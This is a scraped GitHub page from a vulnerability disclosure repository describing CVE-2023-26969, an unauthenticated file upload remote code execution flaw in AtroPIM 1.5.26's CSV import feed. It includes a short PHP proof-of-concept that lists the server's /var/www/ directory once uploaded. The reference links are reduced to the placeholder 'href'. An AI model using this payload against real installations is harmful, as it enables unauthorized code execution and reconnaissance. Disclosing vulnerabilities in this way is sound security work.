CVE-2023-26969: CVE-nu11secur1ty/vendors/atrocore/atrocore-1.5.26 at main · nu11secur1ty/CVE-nu11secur1ty

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Latest commit

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

atropim-1.5.26-Unauthenticated-File-Upload-RCE - Directory Traversal****Vendor

Description:

The Create Import Feed option with glyphicon-glyphicon-paperclip - format CSV upload function appears to be vulnerable to User interaction - Unauthenticated File upload - RCE attacks. The attacker can easily upload a malicious file then can execute the file remotely and can get VERY sensitive information about the configuration of this system, after this he can perform a very nasty attack.

STATUS: HIGH Vulnerability CRITICAL

[+]Exploit:

<?php // by nu11secur1ty - 2023 $dir = "/var/www/"; $ascending_order = scandir($dir); $descending_order = scandir($dir,1);

print_r($ascending_order); print_r($descending_order); ?>

Reproduce:

href

Reference:

href

Reference:

href

Proof and Exploit:

href

Time spend:

00:15:00